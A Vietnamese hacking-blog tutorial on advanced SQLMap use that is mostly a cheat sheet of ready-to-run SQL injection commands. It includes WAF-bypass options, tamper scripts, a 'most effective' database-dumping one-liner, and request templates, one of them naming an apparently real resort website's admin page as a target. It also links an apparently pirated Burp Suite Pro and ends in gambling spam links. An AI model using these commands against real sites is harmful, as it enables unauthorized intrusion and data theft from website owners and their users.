• Network
  • Security
  • Software
  • Thủ thuật
  • Tin tức
  • Video hướng dẫn
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cách sử dụng SQLMap nâng cao

AnonyViet by AnonyViet
in Basic Hacking
Reading Time: 5 mins read
A A
3

Mục lục bài viết

  1. Cách sử dụng SQLMap nâng cao
  2. Dùng Burp Suite Pro Extension
  3. Payload SQL Injection

SQLMap là phần mềm giúp khai thác SQL Injection tự động giúp bạn tiết kiệm thời gian hơn so với khai thác thủ công. Mình đã có hướng dẫn cách sử dụng SQLMap cơ bản, tuy nhiên SQLMap vẫn còn các thông số nâng cao giúp bạn tiết kiệm thời gian khai thác và tăng hiệu quả khai thác hơn. Dưới đây là một số kỹ thuật sử dụng SQLMap nâng cao để bạn khai thác lỗi SQL Injection.

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Cách sử dụng SQLMap nâng cao

Mình sẽ nói sơ qua về cách cài đặt và sử dụng SQLMap trước:

Các bài viết liên quan

Danh sách Payload SQL Injection 4

Danh sách Payload SQL Injection

09/09/2023
Cách dùng Burp Suite khai thác SQL Injection 5

Cách dùng Burp Suite khai thác SQL Injection

05/11/2022
Hướng dẫn khai thác lỗi SQL Injection cơ bản 6

Hướng dẫn khai thác lỗi SQL Injection cơ bản

29/07/2022
sql injection shell

Sử dụng SQL Injection để chạy lệnh và chiếm quyền Shell

30/03/2022
  • Download SQLMap 
  • Download Python

Sử dụng --batch để SQLMap chạy tự động và bỏ qua câu hỏi yes/no

Sử dụng *xác định vị trí cần Injection

Sử dụng --string="String_in_the_response" để biết chuỗi nào đã được Injection thành công (True) 

# SCAN SQL BẰNG ĐƯỜNG DẪN CỤ THỂ VÀ INJECT VÀ THAM SỐ q
sqlmap -u "https://anonyviet.com/s.php?q=test" -p "q"
# SCAN BẰNG REQUEST (CÓ THỂ BẮT REQUEST BẰNG BURPSUITE CHO TIỆN)
sqlmap -r request.txt
# SCAN NHIỀU URL CÙNG LÚC
sqlmap -m urls.txt
# SCAN HEADER VÀ ĐƯỜNG DẪN (*)
sqlmap -u "http://afine.com/user/*" -H "User-agent: *"
# SECOND ORDER
sqlmap -r request.txt --second-order "http://afine.com/avatar"
# ALL-AROUND OPTIONS
## RANDOM USER AGENT ĐỂ BYPASS WAF
--random-agent
## TỰ ĐỘNG TRẢ LỜI CÁC CÂU HỎI YES/NO
--batch
## KIỂM TRA SÂU
--risk=3 --level=5
# CUSTOMIZATION & DEBUGGING
## PROXY TO BURP
--proxy=http://127.0.0.1:8080
## SILENCE | VERBOSE MODE
-v 0
-v 4
## XUẤT KẾT QUẢ RA THƯ MỤC CHỈ ĐỊNH
--output-dir=sqlmap
## ADD PREFIX
--prefix "this_string_must_be_before_injection"
## ADD SUFFIX
--suffix "--this_string_must_be_at_the_end_of_injection"
## MODIFY PAYLOAD DÙNG EVAL (example swap " " with "%20" for q parameter)
sqlmap -u "https://afine.com/s.php?q=1" -p 'q' --eval='q=q.replace(" ","%20")'
## MODIFY PAYLOAD BẰNG SCRIPTS => https://github.com/sqlmapproject/sqlmap/tree/master/tamper
--tamper="PATH_OR_NAME_OF_TAMPER_SCRIPT"
## THAY ĐỔI HEADERS TÙY CHỈNH (Authorization)
-H "Auth_header: secret1" -H "Cookie: auth2=secret2"
# LỆNH SQLMAP THƯỜNG ĐƯỢC SỬ DỤNG VÀ HIỆU QUẢ NHẤT
python sqlmap.py -r request.txt --random-agent --tamper=space2comment --time-sec=20 --level=5 --risk=3 --dbs --batch

Request dạng POST: Inject vào Username, thì điền dấu * vào username=

POST //index.php?module=user&function=login HTTP/1.1
Host: anonyviet.com

username=*&password=1

Lưu file thành request.txt và đặt chung thư mục sqlmap

Request dạng GET:

GET /admin/index.php?option=tin-sua&tin_id=1
Host: phanthiet.terracottaresort.com

Lưu file thành request.txt và đặt chung thư mục sqlmap

Dùng Burp Suite Pro Extension

Tải Burp Suite Pro ở đây

  • Request Timer – Bắt các gói tin phản hồi theo thời gian (thích hợp với blind sql injection).

Request Timer burp suite

  • Burp Bounty Pro: tự động tìm kiếm lỗ hổng bảo mật bằng Burp Suite Pro (bạn nào cần Extension này thì comment bên dưới mình sẽ gửi riêng)

Burp Bounty Pro

  • SQLiPy Sqlmap Integration – Giao diện SQLMap trên Burp Suite

sqlmap burp suite

SQLiPy Sqlmap Integration bup suite

Bất kỳ SQLI nào được tìm thấy bởi SQLiPy sẽ được thêm vào tab Results của Burp Suite.

Payload SQL Injection

Tổng hợp các Payload để test SQL Injection có tại đây: PayloadsAllTheThings.

  • SQLI_output – Error|UNION|Bolean based detection.
  • SQLI_sleep – Time-based detection.
  • SQLI_oob – Out-of-bound detection.

SQLMap CheatSheel tải ở đây: https://github.com/anonyvietofficial/sqlmap-cheatsheet

Bài viết đạt: 5/5 - (101 bình chọn)
Tags: sql injectionsqlisqlmap
AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Cách dùng Hydra để tấn công Brute Force 7
Basic Hacking

Cách dùng Hydra để tấn công Brute Force

17/11/2023
PyPhisher: Công cụ phishing dễ sử dụng với 65 trang web có sẵn 8
Basic Hacking

PyPhisher: Công cụ phishing dễ sử dụng với 65 trang web có sẵn

15/11/2023
Cẩn thận! Tiếng gõ phím có thể tiết lộ mật khẩu cho hacker 9
Basic Hacking

Cẩn thận! Tiếng gõ phím có thể tiết lộ mật khẩu cho hacker

06/10/2023 - Updated on 13/10/2023
Khai thác XSS với Javascript/JPEG Polyglot 10
Basic Hacking

Khai thác XSS với Javascript/JPEG Polyglot

08/09/2023
AnvRS - Công cụ Reverse Shell Bypass Antivirus 11
Basic Hacking

AnvRS – Công cụ Reverse Shell Bypass Antivirus

29/08/2023 - Updated on 27/09/2023
Cách tìm thấy lỗi Stored XSS đơn giản 12
Basic Hacking

Cách tìm thấy lỗi Stored XSS đơn giản

26/08/2023
Next Post

Xổ số SV388 - Sân chơi lô đề trực tuyến uy tín nhất hiện nay

Subscribe
Notify of
guest

guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

3 Comments
oldest
newest
Inline Feedbacks
View all comments
hauvan1416
hauvan1416
6 months ago

Cho mình xin Burp Bounty Pro extensions với

Reply
Bach Truong An
Bach Truong An
5 months ago

cho mình xin burp bounty pro extensions với, mình cảm ơn

Reply
VAP
VAP
25 days ago

Cho em xin Burp Bounty Pro extensions với ạ. Em cảm ơn trước ạ.

Reply
wpdiscuz   wpDiscuz

Liên hệ Quảng Cáo

Lien he AnonyViet

Các bài mới

cach cai trollstore iphone ios 16

Cách cài TrollStore 2 lên iPhone để cài ứng dụng bên ngoài (iOS 15.5-16.6.1 và OS 17.0)

28/11/2023
Tiếp thị liên kết Shopee bằng cách sử dụng VPS  2

Tiếp thị liên kết Shopee bằng cách sử dụng VPS 

28/11/2023
Cách ẩn thanh Home Bar trên iPhone để chơi game không bị gián đoạn 3

Cách ẩn thanh Home Bar trên iPhone để chơi game không bị gián đoạn

28/11/2023
Cách cài đồng hồ lật trên iPhone - Đem lại giao diện mới lạ, độc đáo 4

Cách cài đồng hồ lật trên iPhone – Đem lại giao diện mới lạ, độc đáo

28/11/2023
Cách tải ảnh thumbnail video trên YouTube bằng điện thoại cực nhanh chóng 5

Cách tải ảnh thumbnail video trên YouTube bằng điện thoại cực nhanh chóng

27/11/2023

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

Bản quyền: DMCA.com Protection Status

Phản hồi gần đây

  • Thảo trong Hướng dẫn nâng cấp Telegram Premium chỉ có 15.000đ
  • dxt2812 trong Cách cài TrollStore trên iPhone iOS 14.0 ->15.5b4
  • Thanh trong Cách dùng Mighty Text để xem trộm tin nhắn Facebook, Zalo, SMS…
  • Nhàn trong Học Online cùng bạn bè trên khắp thế giới với Bindr
  • TrungLun0112 trong Cách tải toàn bộ ảnh và video của người dùng Instagram

©2023 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ https://okvip.art/ ku11net.link F8BET W88 ST666 Trực tiếp bóng đá xoilac tv new88 Nhà cái New88 uy tín https://vn88.news/ suncity https://hi88g.com/ Fun88min sodo casino 79king.cam ee88at.com go88 nhà cái Jun88 uy tín Twin xem bong da truc tiep NHÀ CÁI UY TÍN 789WIN xem keo nha cai Xoilac tv Lucky88 6686vni.com 333666.casino 123b com nhận định kèo nhà cái sv388bet.cam hitclub.bz sunwin Kubet1 Jss77 Jun88 tdtc.guru bossnhacai.com Cubet nhà cái j88 https://blognet88.com socolive https://kubet.icu socolive tv https://jun88m.dev/ Trang chủ ST666 https://sodo.uno/ SOC88 ST666 MU88 thabet Tỷ lệ kèo: 7m go88 Kubet88 vaoroi clmm 2023 oxbet 79king.cloud xem bóng đá xoilac nohu.cyou Vietthethao saoke tructiepbongda Ole777 https://iwin68.fit/ xoilac go88 caheo tv https://winbetaz.net xoilac xoilac tv xoilac trực tiếp bóng đá xôi lạc xem bóng đá 33win Trang chủ Bet88 keo nha cai 5 xem bóng đá ee88 qh88 đăng nhập rikvip hit club 88online hb88hb.com viva88 i9bet zbet 7m game iwin club 789bet Keo88 typhu88 rakhoi bắn cá SKY88 KUBET77 Keonhacai trực tiếp bóng đá xoilac Mitom I9BET

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2023 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ https://okvip.art/ ku11net.link F8BET W88 ST666 Trực tiếp bóng đá xoilac tv new88 Nhà cái New88 uy tín https://vn88.news/ suncity https://hi88g.com/ Fun88min sodo casino 79king.cam ee88at.com go88 nhà cái Jun88 uy tín Twin xem bong da truc tiep NHÀ CÁI UY TÍN 789WIN xem keo nha cai Xoilac tv Lucky88 6686vni.com 333666.casino 123b com nhận định kèo nhà cái sv388bet.cam hitclub.bz sunwin Kubet1 Jss77 Jun88 tdtc.guru bossnhacai.com Cubet nhà cái j88 https://blognet88.com socolive https://kubet.icu socolive tv https://jun88m.dev/ Trang chủ ST666 https://sodo.uno/ SOC88 ST666 MU88 thabet Tỷ lệ kèo: 7m go88 Kubet88 vaoroi clmm 2023 oxbet 79king.cloud xem bóng đá xoilac nohu.cyou Vietthethao saoke tructiepbongda Ole777 https://iwin68.fit/ xoilac go88 caheo tv https://winbetaz.net xoilac xoilac tv xoilac trực tiếp bóng đá xôi lạc xem bóng đá 33win Trang chủ Bet88 keo nha cai 5 xem bóng đá ee88 qh88 đăng nhập rikvip hit club 88online hb88hb.com viva88 i9bet zbet 7m game iwin club 789bet Keo88 typhu88 rakhoi bắn cá SKY88 KUBET77 Keonhacai trực tiếp bóng đá xoilac Mitom I9BET

wpDiscuz